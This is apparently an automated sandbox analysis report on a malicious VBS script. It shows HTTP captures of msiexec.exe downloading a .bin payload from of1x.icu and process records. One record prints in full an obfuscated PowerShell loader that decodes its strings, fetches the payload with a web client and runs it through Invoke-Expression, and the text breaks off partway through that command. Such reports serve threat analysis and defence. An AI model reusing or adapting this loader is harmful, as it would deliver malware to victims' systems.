                                          2024-12-12 06:54:11 UTC1369INData Raw: 69 37 67 5a 46 44 36 67 6c 7a 4b 58 59 57 77 65 31 5a 4c 74 44 63 57 2b 6e 6b 69 78 6a 6e 43 32 51 70 6b 2b 76 45 4c 4a 4c 6d 4a 47 32 4d 6d 59 47 71 72 49 65 44 56 46 71 68 56 62 71 44 6c 79 38 73 62 71 57 57 6c 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 4a 63 77 6d 47 72 4a 44 39 71 69 49 69 6d 6a 2b 48 61 4f 49 6f 65 72 77 44 6a 78 6b 69 6d 69 61 42 33 4b 56 46 48 6a 57 76 77 53 4d 53 6d 53 44 69 66 57 43 49 61 49 49 62 50 52 4b 6a 56 74 45 32 47 7a 49 69 73 54 7a 42 6b 6c 44 63 65 6c 49 42 36 38 4d 6d 6b 52 65 64 54 71 36 55 61 65 6e 57 49 72 77 4a 36 71 67 75 51 69 6b 31 57 53 57 53 73 6e 46 37 53 43 4b 72 34 58 35 43 79 69 6a 6e 4b 52 68 6f 2b 56 52 6f 37 2f 72 71 4c 55 46 6b 2b 6f
                                          Data Ascii: i7gZFD6glzKXYWwe1ZLtDcW+nkixjnC2Qpk+vELJLmJG2MmYGqrIeDVFqhVbqDly8sbqWWlFKhV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0JcwmGrJD9qiIimj+HaOIoerwDjxkimiaB3KVFHjWvwSMSmSDifWCIaIIbPRKjVtE2GzIisTzBklDcelIB68MmkRedTq6UaenWIrwJ6qguQik1WSWSsnF7SCKr4X5CyijnKRho+VRo7/rqLUFk+o
                                          2024-12-12 06:54:11 UTC1369INData Raw: 77 39 6c 6e 4b 36 6a 74 2f 54 6e 37 6e 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 54 6c 6a 53 59 69 59 70 45 6a 37 72 61 70 74 53 72 36 76 36 37 2b 6b 6c 58 47 46 52 45 49 77 51 48 4f 69 76 31 4f 51 77 50 55 5a 4a 5a 43 6c 52 39 4f 70 32 50 4c 79 64 4e 53 2f 53 46 4b 67 45 61 55 37 7a 4c 37 65 56 57 57 61 6e 64 51 37 55 49 65 7a 75 62 6c 53 56 51 66 2f 2f 4e 4f 33 63 30 54 68 50 45 54 62 51 2f 31 45 69 6d 66 6c 36 42 63 45 53 6b 71 77 68 77 56 61 38 48 4e 76 6f 51 64 2b 35 56 37 56 46 72 74 54 49 49 33 44 6f 47 66 6c 75 6b 54 46 74 38 64 77 72 47 36 6d 52 7a 78 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 41 55 71 46 58 51 46 4b 68 56 30 42 53 6f 56 64 43 4f 55 58 52 61 6e
                                          Data Ascii: w9lnK6jt/Tn7nQFKhV0BSoVdAUqFXQFKhV0BSoVdAUqFXQFKhVTljSYiYpEj7raptSr6v67+klXGFREIwQHOiv1OQwPUZJZClR9Op2PLydNS/SFKgEaU7zL7eVWWandQ7UIezublSVQf//NO3c0ThPETbQ/1Eimfl6BcESkqwhwVa8HNvoQd+5V7VFrtTII3DoGflukTFt8dwrG6mRzxSoVdAUqFXQFKhV0BSoVdAUqFXQFKhV0BSoVdCOUXRan
                                          2024-12-12 06:54:11 UTC1369INData Raw: 30 64 55 39 53 6e 73 4a 4d 7a 5a 78 2f 67 49 6d 66 4e 58 33 52 46 4b 6a 63 69 42 48 2b 36 35 73 43 57 55 4a 52 34 6f 43 43 54 62 6f 70 75 37 50 55 78 4f 79 41 69 43 47 31 32 53 51 31 62 42 35 6b 71 68 59 37 38 4a 66 61 49 2b 43 64 6b 6e 43 6d 42 73 4d 53 6d 6a 58 6d 75 37 6c 6c 54 67 76 4f 50 54 35 2b 42 73 58 42 56 49 76 49 44 50 54 75 61 67 45 6a 67 31 42 4b 6f 32 6c 53 4e 46 31 79 2f 6e 35 6c 58 69 79 64 69 4a 42 66 43 78 64 58 70 46 66 51 46 4b 69 5a 37 72 37 36 78 2f 71 52 48 46 39 39 44 71 78 58 32 49 76 2b 77 6b 50 63 48 59 64 70 64 78 6e 32 53 72 50 4f 66 56 77 4f 56 63 77 55 4d 31 74 6c 6e 51 59 43 6d 6e 37 42 4c 6b 31 62 4a 45 35 68 57 45 50 35 37 4d 5a 4d 58 37 4e 52 35 57 69 6c 75 45 30 70 76 46 47 52 55 36 68 52 31 51 51 76 57 67 30 70 76 46
                                          Data Ascii: 0dU9SnsJMzZx/gImfNX3RFKjciBH+65sCWUJR4oCCTbopu7PUxOyAiCG12SQ1bB5kqhY78JfaI+CdknCmBsMSmjXmu7llTgvOPT5+BsXBVIvIDPTuagEjg1BKo2lSNF1y/n5lXiydiJBfCxdXpFfQFKiZ7r76x/qRHF99DqxX2Iv+wkPcHYdpdxn2SrPOfVwOVcwUM1tlnQYCmn7BLk1bJE5hWEP57MZMX7NR5WiluE0pvFGRU6hR1QQvWg0pvF


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.749776172.67.216.1434437768C:\Windows\SysWOW64\msiexec.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-12 06:54:52 UTC193OUTGET /NJLIlJfi/OrlcxpGmYPgSWGORxagHTwaJ166.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: of1x.icu
                                          Cache-Control: no-cache
                                          2024-12-12 06:54:52 UTC854INHTTP/1.1 200 OK
                                          Date: Thu, 12 Dec 2024 06:54:52 GMT
                                          Content-Type: application/octet-stream
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: max-age=14400
                                          CF-Cache-Status: MISS
                                          Last-Modified: Thu, 12 Dec 2024 06:54:52 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwM5dIZp2IuanHdLwHViVBoW1FdIPxSPksIBC%2Fj%2BDY33nLFqCZsrHd7sjO2HEP3b2P5HuyQl2atGDX6mgkg5vDpnnyHEPSG36yPGCiocOiIZPvPMn%2BFAs3jR5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8f0bce3938f8f797-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1629&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=831&delivery_rate=1748502&cwnd=151&unsent_bytes=0&cid=090af66b369c0238&ts=684&x=0"
                                          2024-12-12 06:54:52 UTC515INData Raw: 33 38 64 36 0d 0a f0 aa 43 91 24 8b b0 7d 25 23 66 ab e6 1a 64 4e ac 04 54 df 14 53 40 1e aa ee 01 b7 16 52 d2 50 16 1a 21 22 31 44 73 3e f3 40 57 cb cb 62 a6 77 54 b3 a1 4a f6 cf 3c d0 97 db 7c b1 9b 4a ce 3a 5b 4e 25 90 32 a3 57 f7 64 ab 8a 0e 68 f0 69 c4 53 b8 a2 47 74 62 2f ad 0e 89 6c 72 7a 4e 4c 50 e7 4c 47 23 e7 f4 5a 40 09 99 6b 94 c9 e1 c6 61 0b 67 70 c0 52 9f ea a8 9e 9e 46 c4 b9 73 85 fd 10 1e 01 12 4b 04 66 e6 6c a6 45 08 67 69 67 9f 64 25 ac f9 4a 4c 90 34 bd 3e 81 f3 ac 5d 04 62 27 11 42 75 d2 11 45 1c 88 9d 8f a5 d5 17 14 e8 f7 cc 24 e0 0e d5 d5 88 b1 5c 5f cb f7 80 5a 72 b3 0f f3 f4 76 3a 99 0e c4 4d 0b bf 22 48 77 da 87 6f 66 ac 55 a3 18 56 e0 80 69 1f 54 aa 6b 91 71 7a ad 3a 2c 51 b8 8f dc 8b ae 11 14 14 05 52 a2 d4 d0 b7 7e 87 c2 ab 6b
                                          Data Ascii: 38d6C$}%#fdNTS@RP!"1Ds>@WbwTJ<|J:[N%2WdhiSGtb/lrzNLPLG#Z@kagpRFsKflEgigd%JL4>]b'BuE$\_Zrv:M"HwofUViTkqz:,QR~k
                                          2024-12-12 06:54:52 UTC1369INData Raw: 95 85 b3 e5 ce aa 01 59 3d 18 6f 3d 39 7c bc d5 3e ae 3b 58 bd 9c 0e 2d aa 5c 86 69 c6 c3 e2 20 e1 fe 2f 46 f3 39 e2 47 27 32 96 6e eb c7 72 51 98 18 0c 7c 89 e8 41 2e be 64 9c b8 05 d0 80 51 38 f7 b9 ac 1c d1 60 50 36 c9 17 a6 22 a9 03 6b 0a e9 96 90 24 28 db 78 08 8f a2 8b d7 8c c9 0c 06 53 77 7d bc 39 5c e3 78 d7 e7 5c 72 c4 8d 82 48 2d 12 e7 14 37 27 93 1c da f6 51 8c b6 f1 25 ea 49 fe 39 3d be f7 cf 0d 83 d1 33 29 00 84 46 3a 12 84 09 88 33 19 51 7d 92 60 99 ab 18 1f 52 0b 9f 0b ce 44 3d 59 9f 2f b0 8c d4 7f 12 44 25 0b 5d ec 93 a7 59 0f f6 5f 6a ca d1 2e 85 2d 75 0c 40 44 34 2f 84 b9 51 14 25 b0 4f e5 ff c0 de d6 61 e9 e3 bd 3b 6e 3e 62 4e 17 13 4d 21 c6 61 9a fa ea 33 9d 3b 21 05 71 97 7b 65 d4 dd 68 d8 1b 47 c6 b0 59 c6 54 8d b7 c6 dc ba d1 2a e0
                                          Data Ascii: Y=o=9|>;X-\i /F9G'2nrQ|A.dQ8`P6"k$(xSw}9\x\rH-7'Q%I9=3)F:3Q}`RD=Y/D%]Y_j.-u@D4/Q%Oa;n>bNM!a3;!q{ehGYT*
                                          2024-12-12 06:54:52 UTC1369INData Raw: a5 dd c3 8d fd 27 d6 3b e1 a7 ec 77 90 6b a5 07 cf 69 9a 6e eb af 6b d0 dd 18 e4 b0 2d ee 41 77 78 dd 7c ec 42 d0 68 cf 35 f7 b9 c4 3f 50 25 50 de 7f 23 a5 22 f0 c0 d2 72 bc d1 be b8 c5 ae 0c 08 e7 8f ff e3 89 21 ac 22 50 77 24 0d 56 5c 5a 84 83 a0 5c 9a 4c be 82 48 45 25 66 51 37 cf 3b 28 d9 96 26 3d b8 90 e8 13 1c b9 e5 ac cf c4 cf 9d ee 90 b2 16 01 6c 36 78 14 84 50 4b 8a 01 07 3a 92 88 db a6 18 1f 7a 40 1e 0e e0 c8 06 19 fd 2f e9 4f 79 88 29 45 25 71 5a 55 a3 ff 1e 0f 1e 92 5f ca d1 46 d0 ac 30 0c a8 79 00 2c 84 e0 d2 7e 25 c9 31 c9 d4 b3 36 f3 52 e9 ea d5 64 ef 7b 12 a1 32 27 4c 21 9f a2 dd 1c bc 74 9d d3 5c 76 70 97 13 0c 55 98 68 70 14 73 05 9e 67 63 84 71 93 81 dc 62 b4 59 e1 88 7e 39 8f 93 18 f2 1e 4b e8 35 eb af 67 a6 b6 69 b1 d0 2f 77 77 4e f5
                                          Data Ascii: ';wkink-Awx|Bh5?P%P#"r!"Pw$V\Z\LHE%fQ7;(&=l6xPK:z@/Oy)E%qZU_F0y,~%16Rd{2'L!t\vpUhpsgcqbY~9K5gi/wwN
                                          2024-12-12 06:54:52 UTC1369INData Raw: 60 7c ad 50 19 ed 41 af 57 b8 9c b8 05 5b 88 f0 e8 9c fe ac 4f 87 53 8b 61 76 47 cd 65 a9 38 ea 0e e9 96 be 2e 62 1d dc 63 c8 a2 28 4e 33 e2 0f 16 d0 4a ad a5 7b 5c 1c 25 a2 fd 0f f9 0b 65 c7 66 2d 12 8f a4 48 62 b3 f4 9f b9 7c fe 8b c6 b9 d3 62 fd e5 1d 32 bb eb 8d 6e c3 3b 53 01 0f 03 40 3a 3a 0a 88 33 16 d5 07 93 60 99 e3 9b f7 13 04 1a 3d e1 20 5c ad c3 ab 9a cb 90 23 67 4a ae d4 b2 dd a6 a9 59 5c 09 ba 64 59 94 2e 7a 18 a1 67 07 44 8d 77 c9 fe 11 fc 7c 75 61 91 c3 0d 3e 98 26 e9 67 31 1f ba 3e 12 49 41 79 6f de b3 75 8c 6f ed 33 9d 6b 77 6f 63 ff d3 4f 93 dd e5 14 3f 97 06 9e 3e 48 43 ee c4 c6 8c dc 69 b2 ad cf 16 c7 82 f2 a0 1a e7 78 03 d0 a7 6c 0f bf f5 ff 3c 34 5b 23 31 4e 0a b6 51 f0 b0 04 dd 16 24 be 8c 34 07 69 9f fb 72 0b 5e a9 59 60 84 b3 93
                                          Data Ascii: `|PAW[OSavGe8.bc(N3J{\%ef-Hb|b2n;S@::3`= \#gJY\dY.zgDw|ua>&g1>IAyouo3kwocO?>HCixl<4[#1NQ$4ir^Y`
                                          2024-12-12 06:54:52 UTC1369INData Raw: de f5 16 a6 22 24 8f 4f 82 e9 96 be b8 7d a2 0c 08 02 ee 5a 8e 61 3f 0d 16 53 fa 31 ea 2c b4 fa 7d d7 e7 e2 fa ee ca 82 c3 e5 99 31 fc 43 db 4c e3 b0 b6 29 01 e7 50 7b cc 49 01 f0 28 2b b2 cf 24 fa 9c 74 53 e9 1d 47 4c 17 ee 29 2b bb 33 16 7d 33 a4 b3 ec 18 49 ed 3e 5f 61 a7 20 ff a1 d4 68 b0 bf 50 81 82 6e 62 1b f9 78 b9 ee 59 ac 6e 85 2b ca 72 b2 af 6a 75 f3 55 2c a0 6a 84 d3 31 42 da 45 a1 bb d4 b3 21 c3 31 7d af bd b6 22 1a 02 a1 bc 13 4f 21 98 ea 81 a1 28 27 9d 6d aa f4 99 1a 78 65 d4 56 3c bc 13 7c c4 e8 2c 2b f3 01 0e c4 dc 8a b8 e0 f8 d6 15 42 85 17 da 1e e7 90 27 37 b2 6c c3 0f af 2d b1 b8 c7 f8 4f 0b 0a b6 1b b9 b5 04 d5 ce a2 64 89 75 77 d7 c7 b6 dd ad c0 67 b1 a5 0d 63 1e 8d ec c8 3e 1c af f5 06 d7 d5 6e 67 98 3e 60 a7 7a 21 1f 36 51 3a 10 0e
                                          Data Ascii: "$O}Za?S1,}1CL)P{I(+$tSGL)+3}3I>_a hPnbxYn+rjuU,j1BE!1}"O!('mxeV<|,+B'7l-Oduwgc>ng>`z!6Q:
                                          2024-12-12 06:54:52 UTC1369INData Raw: 12 53 77 f6 82 18 50 b3 94 f5 e3 5c 72 4f c9 a6 40 73 d0 e3 14 64 72 e5 4b 51 ea 5b ea 59 49 da 44 a1 ba e1 44 bf 7c 27 16 49 52 4e 53 09 f7 65 a4 f0 7a f6 77 b8 11 10 2c 19 af 71 4e e5 e0 ed 5b 14 80 08 fd a1 d2 01 7f 58 db 62 dd ed c7 e1 17 b1 c4 7b 64 a4 f0 09 24 9c 41 1a 78 6d ee 88 f3 bf 14 dc 25 89 b9 11 4d 75 fb aa 79 12 4d 21 29 ea 21 02 d2 36 6e 3e 91 6f 17 98 80 c9 5c 9f 9b 03 61 f8 16 cb c9 94 8f 68 84 ee c2 56 a3 11 0b af d2 9d 3e a0 b6 bc c4 4d 13 e0 d3 40 e0 01 06 a2 85 28 e7 e5 b8 26 b6 6e 70 68 0f 66 02 0b b5 b8 29 34 c0 3a 58 0d ff 48 b3 04 84 16 2c b0 3b 00 f5 2d ca 70 54 45 12 54 a6 c6 8c 1f 3a c8 04 b5 d4 97 ea 71 4f e7 d3 fd 74 71 c1 45 08 a0 99 76 b8 5d 3a 9b 5f 7e 3f 10 52 72 63 60 92 af 55 d2 15 2a e0 ca 28 50 f8 1b 69 a4 62 68 fc
                                          Data Ascii: SwP\rO@sdrKQ[YIDD|'IRNSezw,qN[Xb{d$Axm%MuyM!)!6n>o\ahV>M@(&nphf)4:XH,;-pTET:qOtqEv]:_~?Rrc`U*(Pibh
                                          2024-12-12 06:54:52 UTC1369INData Raw: f4 aa 7b 80 01 8b c9 0f 00 ac a3 27 40 bf a1 44 6c 6e 7c ca ac fe 0f 46 77 53 a0 01 fa 37 47 93 79 92 eb 57 43 18 1b 12 0b 53 23 bc 7e 1a 2d 16 45 9a 8f 90 ee 91 38 01 1f 5a bf 18 70 2d 26 1e 27 95 35 2e 17 c1 09 7d 7e 5e 12 bf e4 6c c3 e8 eb da fb aa 1a 63 5b b6 2f 9e 16 e9 8d 00 1a 1a 1e 17 61 17 ff 20 2d 63 56 3c b1 f1 99 3b 77 52 fa 6e 93 99 d0 dd 68 13 6f 63 0a 15 f1 9b fb 9b 9c 2e 57 74 2c d5 d9 b8 65 59 85 19 f0 28 1e 87 14 be 7d 93 3f b0 96 b6 b2 b8 7f 54 03 ce 76 7a 07 e5 c4 1b 07 63 e4 40 1a 9b 48 81 8c 02 65 52 c0 66 d2 39 34 93 11 9e c2 6e 56 1d 47 e2 3c 5c 08 06 0e e1 c8 44 26 e2 42 51 dc 41 3a 9b 06 ab 9c a7 5e 15 5c c1 d3 63 59 b1 5a 5e d1 75 b4 fa 07 d3 2c 1a 78 25 fb 03 b0 8c 45 a2 2f cf 26 d5 15 50 e6 dc 5f 1a 43 64 3e 13 13 f1 3d 5b 09
                                          Data Ascii: {'@Dln|FwS7GyWCS#~-E8Zp-&'5.}~^lc[/a -cV<;wRnhoc.Wt,eY(}?Tvzc@HeRf94nVG<\D&BQA:^\cYZ^u,x%E/&P_Cd>=[
                                          2024-12-12 06:54:52 UTC1369INData Raw: 11 d5 8c 09 e2 33 73 50 f6 df 88 71 40 ed e0 ed 61 9f 21 e0 c8 e6 4e fd 2f 7c dd 6f 16 36 ac 38 ef a5 13 18 61 b1 42 f6 af 6c f9 03 6c be ef f8 44 bf 4b 72 e5 0f 78 48 d7 4f 72 9e e5 b7 bf 21 a2 45 e5 02 24 d3 91 c1 91 8d 1b d1 47 21 ac 60 9b 88 ce 3f 62 4f 05 09 99 13 93 9a 2b 5e ac 94 d9 4f 06 77 20 a0 3d e9 95 2e c2 8a d3 2a b9 4a 12 4a e7 f1 18 1a e7 29 03 2d b2 6c 0f bf bc 2b b1 51 54 bf 31 4e b2 f4 bd 4f ba c7 0f d1 d0 37 e9 3f 87 69 9f 70 d6 89 4f 40 75 39 0f 63 74 dd 6e 3c c3 68 8b 7d 2e 43 10 12 fd e7 fa 3d ee b0 c9 f4 35 3b 3b 64 72 0a 66 10 9c 67 63 60 92 af 55 9b 12 a1 96 75 87 50 f3 fc fe 84 6f 56 50 a9 19 8c ea 21 4b d5 52 4f 76 0e d5 66 5f 91 01 9f de 13 cc fa 3d 5b 81 5c ac 5c 0d 27 7d b6 ea 40 fb 76 61 af 4d 89 87 b5 23 86 94 a3 62 9a 03
                                          Data Ascii: 3sPq@a!N/|o68aBllDKrxHOr!E$G!`?bO+^Ow =.*JJ)-l+QT1NO7?ipO@u9ctn<h}.C=5;;drfgc`UuPoVP!KROvf_=[\\'}@vaM#b
                                          2024-12-12 06:54:52 UTC1369INData Raw: 3f 58 e5 90 22 12 14 a8 5e 52 bc 1e e4 55 e7 97 af 6c ca 81 a3 c0 d1 fe c2 10 ac 45 de 7b 46 41 99 68 78 89 dd 93 b3 de 86 ea 27 02 65 38 6e 3e 99 8f 49 98 aa 7c 04 71 64 96 15 59 9d c4 55 21 61 c6 93 b8 d0 dd 68 5a 13 47 ef ab d2 5f c2 62 80 e2 d8 01 da 11 e8 87 82 8a cc d2 18 91 e6 f3 a7 11 b6 47 0e 37 86 ed b5 b8 96 51 ce b1 f5 b7 91 e0 b0 04 0f 9c 7f 7f 24 14 ac 68 5d ff 9a 44 bb 56 a6 c6 59 34 95 a0 20 2a b7 ed f8 99 28 50 08 12 89 aa ba f1 58 97 36 ea 10 49 d2 c6 e8 d1 95 d3 a9 0b 52 4e ee 3c 0f a6 62 85 32 75 0c 8b 90 d7 fa 49 90 95 ea 0e 4f 07 30 f9 29 de fd 94 cb cb c8 0c 54 e5 35 eb 5a df 17 84 0c f7 e2 e4 7d b7 d9 5c 38 f2 da 1e 3b 67 61 6b 00 93 8b 1e 67 a3 68 12 b9 7d 7f 6b 51 20 04 95 09 90 b9 e6 27 69 2d a6 3c 55 ea 9f d4 f2 e6 43 1d d8 16
                                          Data Ascii: ?X"^RUlE{FAhx'e8n>I|qdYU!ahZG_bG7Q$h]DVY4 *(PX6IRN<b2uIO0)T5Z}\8;gakgh}kQ 'i-<UC
                                          2024-12-12 06:54:52 UTC1369INData Raw: 87 50 cf fe d8 55 82 de 1b a3 fb 61 91 93 e6 53 fa 5b 6c 15 c9 41 04 3e 47 c2 d9 fb 0c d1 39 9e e0 3c 9e 5f 16 7f 05 19 fa 59 84 55 3c 4d 81 67 e4 17 8d 50 d6 28 d4 16 3b c5 1b da 3b 4a 3d 77 e9 c9 ca da 4f 21 93 5c f7 40 93 e7 c1 0e 11 c6 4e 47 f2 b3 0a cb d1 51 52 3c 3b ca 87 5e a4 db 5d f9 78 96 cf 13 ad 70 b4 56 b2 20 84 2f 3a c0 ec 72 d5 e3 50 72 05 28 39 bd ea 26 d7 ce d3 e4 21 96 e9 ae c5 18 c2 22 e1 36 04 68 d8 6f ee 94 04 06 9d 67 70 d1 ba bf 8c b4 b3 a4 ef 7a fc 03 83 8c 31 69 f7 09 35 07 e3 94 21 ec b9 97 8f 04 7e 13 e0 e7 3d 5b 81 6d 80 c5 22 9f a6 91 aa 2a f1 76 c7 cd 60 e5 50 4b fc 91 94 5a 75 b1 60 45 25 ab c2 4d af 47 ca 7c c0 97 4d 59 c3 d6 05 d7 ad 24 c1 80 c5 cd 61 50 14 c5 be 63 e4 d1 74 25 72 78 9f ae 8c 44 59 b0 2a c5 bc 81 14 3f 0e
                                          Data Ascii: PUaS[lA>G9<_YU<MgP(;;J=wO!\@NGQR<;^]xpV /:rPr(9&!"6hogpz1i5!~=[m"*v`PKZu`E%MG|MY$aPct%rxDY*?


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:01:54:05
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Strait STS.vbs"
                                          Imagebase:0x7ff7eb270000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:01:54:06
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 (Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefra FandForlePlowr P dsBenp[,yds$MallEGra,r Cheh S evKulteSwelrTellv RemsKomps .ury AksgEnerd hino arkmArchmNaboeasshn ndle L n]Symb=Stra$ TilCSa bh rydeGatfm ewoIndgtBronhForbeT ddrSupea stapChesy');$Faerie=Exposes 'Hved$C emTGasavTaariCompsinqutBozaec nvpKarau DiknRe ik Jartteame Rr tSkots ps.TungDPantoFoulwCockn ilgl ParoA enaPit.dKretF I tiCop lstemeEl c(Gath$Ka.tRRabaiFlerdDravaOp pbM dllPar eP lmn At eOomisBattsR ot, fon$LsniEPro.xProjcangie K vpGirrtSinfoSquarFast)';$Exceptor=$Modenhedernes;Nonprecipitation225 (Exposes 'Cerb$I dkgMethlU drO nivBboucAK lvLUnna: LykSProjtUndeaintemSym,cRhodELipol vrtlMisyeMeddROrthnFleaendes=Inse(Rev tNoddE sims Allt Sai- acpAppla.ehjt Br.HC.st Sik$ApotesubrXEnkecToilEWarePTes TCabroDiodR Hes)');while (!$Stamcellerne) {Nonprecipitation225 (Exposes 'Semi$Re.sgHjvelA,tooJo.rbAutoaSu elEnkr:SigvSEmbekSlariPlanfD,bltLandeSweeb SpoeVarmh rapaSignnTestdBn.elBo,tiMystnPolygActis vlv=Slad$Non B Spir Notn InveIndihDrikaUn evAmieeLockpMucidbo kaSalmgGl.woToilgSucreBlocra ganSlokeTears') ;Nonprecipitation225 $Faerie;Nonprecipitation225 (Exposes ' rdeSDrueTBloca,jaeR ol.TT nn-AstrsUnchl ideeD spe SkrPU,gi Ud,o4');Nonprecipitation225 (Exposes ' Bra$ ntgRetslPl toNonpBEddiABes Lmi t:,mpoSTonetArguA Pa MPlascFiniES.aml FeslDeavEKommrPhotn riseFink=Ce.t(Ru.dT.verefylds tanTSkaa- CabpSt,ga uldTlaurH Inc Lys.$Mi.sEA tix N nCRserE verP artUndeOSammRUnr,)') ;Nonprecipitation225 (Exposes ' Cor$PalsgAddilProtoDankBvinyAKbstl R s:ProbJA phe riR KonnCropBlderATuesNRentEvisusT azTRdblAN.leTRokeIKretoKnobNToqu= Sa,$ Sa G Alml Kr.OBrygbSp,ca InaL Dis:reflDFerlI VrdP In,hSkoveOrign .nfH Ergy Ju dCol rLfteAT,lemConciFolkNUanse eps+ Ove+ Sal%a,pr$Ta.lnBrdbaP.arRNonccSkbnOE,nrSRaaki BlosStiv. TilCS inO,angu alln Fo T') ;$Ridableness=$Narcosis[$jernbanestation]}$Radiatory=326426;$Huppahs176=31719;Nonprecipitation225 (Exposes 'Toll$Kempg SublExc O .aabKorsAUdadl Tal:KonfyhebenFremDAutal SvmIVejoN AlrGHjemsKr mOUnd,fEvelfStaneFremr Spr ,amm=Seam L vegM nheronttTran-Obduc RelOAchiNK.dnTFlete lanGomatBedf Pea$ kuleUdstxEm ncEgene,utipWurztAlloOPedar');Nonprecipitation225 (Exposes '.lal$Caddg BonloveroBervbhal a ompl efj:Hy eE N,tkMisasPar.pSkoloamstrMeattStr vSyrurAdumd Sc,iOrph V.s=Va.e Gide[EnwhS Ud yStttsFir tProteVentmSis 